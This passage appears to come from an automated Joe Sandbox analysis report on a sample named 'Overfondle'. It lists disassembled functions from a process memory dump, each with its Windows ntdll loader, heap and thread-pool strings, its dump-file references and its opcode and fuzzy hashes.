                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 20498421
                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 2049855E
                                                                        • @, xrefs: 20498591
                                                                        • LdrpInitializeProcess, xrefs: 20498422
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-1918872054
                                                                        • Opcode ID: 547735b056149b1dba9a81e4ef0453fe6546577f6c987f1d57503fc955ac4f57
                                                                        • Instruction ID: db1013cfd979b9d7600060f96d1a655a6353c9dc9910e09e2c59dcee786ae264
                                                                        • Opcode Fuzzy Hash: 547735b056149b1dba9a81e4ef0453fe6546577f6c987f1d57503fc955ac4f57
                                                                        • Instruction Fuzzy Hash: 9F91A171508344AFD311DFA8CC51F9BBBE8BF94798F40892EFA8492551E738DA04DB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 2049273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • SXS: %s() passed the empty activation context, xrefs: 204D21DE
                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 204D22B6
                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 204D21D9, 204D22B1
                                                                        • .Local, xrefs: 204928D8
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                        • API String ID: 0-1239276146
                                                                        • Opcode ID: 167c63724b2cb1c974eb1c852d9ade2e46f6bc06593387cb086f92736b840e6d
                                                                        • Instruction ID: 12278e84fe976cd5f834d2df6e10bd882edf5e4de342aebe1a3058ab3abc8b2d
                                                                        • Opcode Fuzzy Hash: 167c63724b2cb1c974eb1c852d9ade2e46f6bc06593387cb086f92736b840e6d
                                                                        • Instruction Fuzzy Hash: F0A18F71A4122D9FDB20CFA4D984B99B7B1BF68314F2181E9ED08A7351D7389E81CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 20494AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 204D3456
                                                                        • RtlDeactivateActivationContext, xrefs: 204D3425, 204D3432, 204D3451
                                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 204D3437
                                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 204D342A
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                        • API String ID: 0-1245972979
                                                                        • Opcode ID: 875b95e0184681888bf71f829d8da1f457fb067cce0738c3fa79cf905587d700
                                                                        • Instruction ID: cbf22b0b04c7a8d6fb598d63a5552ed0494e20375374f4b2b87e48b07acdf284
                                                                        • Opcode Fuzzy Hash: 875b95e0184681888bf71f829d8da1f457fb067cce0738c3fa79cf905587d700
                                                                        • Instruction Fuzzy Hash: 17615232601A059FC712CF98C892F1ABBA0AF80B69F61C56DF9549B341D73CED01CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204664AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 204C10AE
                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 204C0FE5
                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 204C106B
                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 204C1028
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                        • API String ID: 0-1468400865
                                                                        • Opcode ID: cf34a7416ac37e56d1f0c2ec17b8fbe20bb9c4faab5f4ba8fe5ca10f62bcc734
                                                                        • Instruction ID: e3059a6763d06c42fc37395ca93ddd1f5517c2a2becdc76e16a1eeed6f0ae0a5
                                                                        • Opcode Fuzzy Hash: cf34a7416ac37e56d1f0c2ec17b8fbe20bb9c4faab5f4ba8fe5ca10f62bcc734
                                                                        • Instruction Fuzzy Hash: D971C2B1904344AFC710CF94C886F877FA8AF55B58F10856CF9498B246E738D589DBE2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204729A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 2047327D
                                                                        • HEAP[%wZ]: , xrefs: 20473255
                                                                        • HEAP: , xrefs: 20473264
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                        • API String ID: 0-617086771
                                                                        • Opcode ID: cc7783e4385286341086df92b9e3de3bac0089d135c2f662fa9ed7f99cb4bf39
                                                                        • Instruction ID: ee0d3b7f7b61a67fa218d47225f4d27918fb6ed960dd35f3d155f0130bb58714
                                                                        • Opcode Fuzzy Hash: cc7783e4385286341086df92b9e3de3bac0089d135c2f662fa9ed7f99cb4bf39
                                                                        • Instruction Fuzzy Hash: 09929A71A042489FDB15CFA8C580BEEBBF1EF49304F14C499E885AB362D739A946DB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 2050A118 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 591timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: @
                                                                        • API String ID: 3446177414-2766056989
                                                                        • Opcode ID: ec56a3ecc0561c6f93bebca796fdb719165dc4ba155b69da2506042c9b3a4f86
                                                                        • Instruction ID: 44746b9c51dd56e06d83462dc247be3d4640eed1e350de57f1c774aeeeb213ce
                                                                        • Opcode Fuzzy Hash: ec56a3ecc0561c6f93bebca796fdb719165dc4ba155b69da2506042c9b3a4f86
                                                                        • Instruction Fuzzy Hash: 0C22DF746046518BDB15CFA9C09077ABFF2FF48340F148959F9868F286E379E982DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 20486962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $@
                                                                        • API String ID: 0-1077428164
                                                                        • Opcode ID: c33672f5ad0b649e46ad34b1587eb5d632bfaedd81eb939125a2a836221e971f
                                                                        • Instruction ID: 6d75fcc2025fe757c304ef66c1dae3282378237a6017afe1cef05f23de742797
                                                                        • Opcode Fuzzy Hash: c33672f5ad0b649e46ad34b1587eb5d632bfaedd81eb939125a2a836221e971f
                                                                        • Instruction Fuzzy Hash: 78C27871A083419FE725CFA4C891F9BBBE5AF88744F04C92DEA8887351D738D945CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 2045A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                        • API String ID: 0-2779062949
                                                                        • Opcode ID: a1c37befbf1d2191d18f61692daf8bddca60e0c68056b03258f619686f519100
                                                                        • Instruction ID: bb90cf0f20f1acd3d503174ecc4ccd4bb68ff87cad5cc5b122a6539b929f2ba4
                                                                        • Opcode Fuzzy Hash: a1c37befbf1d2191d18f61692daf8bddca60e0c68056b03258f619686f519100
                                                                        • Instruction Fuzzy Hash: 2FA18B71D112299BDB21DFA4CC99BDAB7B8EF54704F1081EAE908A7210D7399F85CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 20470A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-1334570610
                                                                        • Opcode ID: 23a744e5d551cadf8ad0a676ec10ccc4cc802d5375614c4835fdb8e6baa15f62
                                                                        • Instruction ID: 87692ece634ab932c3d9396712fa446195860114d66293b6bdd716e1947e816f
                                                                        • Opcode Fuzzy Hash: 23a744e5d551cadf8ad0a676ec10ccc4cc802d5375614c4835fdb8e6baa15f62
                                                                        • Instruction Fuzzy Hash: 91615870601341DFD718CFA8C481B9ABBF1BF55708F24C55AE8998B2A2D778F981CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 2051C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • @, xrefs: 2051C1F1
                                                                        • PreferredUILanguages, xrefs: 2051C212
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 2051C1C5
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                        • API String ID: 0-2968386058
                                                                        • Opcode ID: 33e86edfcdf7b0a2669d29575921f7b021260fe0d4c25db7caf09698bffb62f2
                                                                        • Instruction ID: 3cd85f518bea3f620e7bb769ed58ad297f9c150a57166d13a26c24c0efcc2fc3
                                                                        • Opcode Fuzzy Hash: 33e86edfcdf7b0a2669d29575921f7b021260fe0d4c25db7caf09698bffb62f2
                                                                        • Instruction Fuzzy Hash: 12417F76D00219EBEB01CBD4C891FEEFFB8AB14704F10806AEA55B7240D7799E84EB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204F4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                        • API String ID: 0-1373925480
                                                                        • Opcode ID: 271d1c6a8b66ce22b834ac5d0228d8a2811b8bb6536a020dfae95330678c73f4
                                                                        • Instruction ID: 5ede25c5aa16da463f7f948d36d79af9fdff66ffeb2bc28d06f6c696dfc670ad
                                                                        • Opcode Fuzzy Hash: 271d1c6a8b66ce22b834ac5d0228d8a2811b8bb6536a020dfae95330678c73f4
                                                                        • Instruction Fuzzy Hash: AE41173190025C8BEB21CBD4C988B9DB7B4FF95784F2584AAE900EB791DB3C8941CB11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 2046A2C3 Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • PSC , xrefs: 2046A348
                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 2046A2FB
                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 2046A309
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: PSC $RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                        • API String ID: 0-3250076594
                                                                        • Opcode ID: f40b58e9126f12f1dd317f74bcf3c1aefcf7c78910d576010d164d6070b928c4
                                                                        • Instruction ID: e3e20ea8bf3878ad2c1db747ea23d9abdc59b3ef72c9de5775275a9234d23741
                                                                        • Opcode Fuzzy Hash: f40b58e9126f12f1dd317f74bcf3c1aefcf7c78910d576010d164d6070b928c4
                                                                        • Instruction Fuzzy Hash: C1415935A04A55DBDB11CF99C580B5977B4AF85B04F20C0AAED04DB351F27D9E81CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204E20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 204E2104
                                                                        • LdrpInitializationFailure, xrefs: 204E20FA
                                                                        • Process initialization failed with status 0x%08lx, xrefs: 204E20F3
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-2986994758
                                                                        • Opcode ID: 13d65902b8e9de142fc6727c3d0f400028d0e6d6a7e386ad67f27d64a36b0151
                                                                        • Instruction ID: 23dcfb2823737d8bfd28ceb8bad152b3a5e165c2a5dc436e987f39633152a50c
                                                                        • Opcode Fuzzy Hash: 13d65902b8e9de142fc6727c3d0f400028d0e6d6a7e386ad67f27d64a36b0151
                                                                        • Instruction Fuzzy Hash: DCF04C719402087BE710D7CDCD92F997BA8FB50B89F508059FE0477391D2BCAA40CA40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204703E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: #%u
                                                                        • API String ID: 48624451-232158463
                                                                        • Opcode ID: 77b34ea87fb44f3d3fc61285863dc2fb9dd77e65ab090f4c60e65ca79acc6917
                                                                        • Instruction ID: 551308fc1e9aac914312e2580584e69c83bd035137277e5690ece43dbf16a873
                                                                        • Opcode Fuzzy Hash: 77b34ea87fb44f3d3fc61285863dc2fb9dd77e65ab090f4c60e65ca79acc6917
                                                                        • Instruction Fuzzy Hash: 5B712D71A011499FDB01CFD8C991FAEB7F8BF58708F158069E905A7261E738EE41CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 2048EBFC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 138COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: \U
                                                                        • API String ID: 0-2992332667
                                                                        • Opcode ID: 59508800256919395658b36ffedaacc97120f136f0e0c7185521dbf1884e6b2a
                                                                        • Instruction ID: 0e4b4112fc9f211139cd83970416ef5da8b941d86b91476c1b3a236f29d14a2c
                                                                        • Opcode Fuzzy Hash: 59508800256919395658b36ffedaacc97120f136f0e0c7185521dbf1884e6b2a
                                                                        • Instruction Fuzzy Hash: C7419AB16047019FD710DFA9CC80A4AB7E9FB98218F10C92EE957C7721EB3DE8499B51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204E892A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 204E895E
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                        • API String ID: 0-702105204
                                                                        • Opcode ID: ad1b9c9b6531076f136b6372d334e403db461b74c55a0be6945944765756eeba
                                                                        • Instruction ID: e8b49dad3453a7c187126b8b771a2fa46c06f3a51de1a33e35435e71f86aed28
                                                                        • Opcode Fuzzy Hash: ad1b9c9b6531076f136b6372d334e403db461b74c55a0be6945944765756eeba
                                                                        • Instruction Fuzzy Hash: AE0147B6A006009BDA124BD78CC0B2A7FA0FF91699F00402DF68D03A53CB2CAC45D793
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 2046A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • LdrResSearchResource Exit, xrefs: 2046AA25
                                                                        • LdrResSearchResource Enter, xrefs: 2046AA13
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                        • API String ID: 0-4066393604
                                                                        • Opcode ID: e770d89e6f67df9c104342a671796696912afd0a8dd0c75d4e5aa3d6bfb4a762
                                                                        • Instruction ID: 02de62bcd37a51e847ac48e3a3e05d508382fa5689884ccdc80af8d42dda894a
                                                                        • Opcode Fuzzy Hash: e770d89e6f67df9c104342a671796696912afd0a8dd0c75d4e5aa3d6bfb4a762
                                                                        • Instruction Fuzzy Hash: 15E16C75A00618AFEB11CBD5CA80B9EB7B9BF44B54F10802BEA00E7251EB7C9D91DF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 2052A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `$`
                                                                        • API String ID: 0-197956300
                                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                        • Instruction ID: bd312acbe097605e82551c3a15f4d6343df6d49d6c56c54e7c312adc3e58977e
                                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                        • Instruction Fuzzy Hash: 3DC1EF31204B429FEB14CFA4D841B6BBBE5EFD4718F148A2DF6958A2D0D778E905CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204DE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Legacy$UEFI
                                                                        • API String ID: 2994545307-634100481
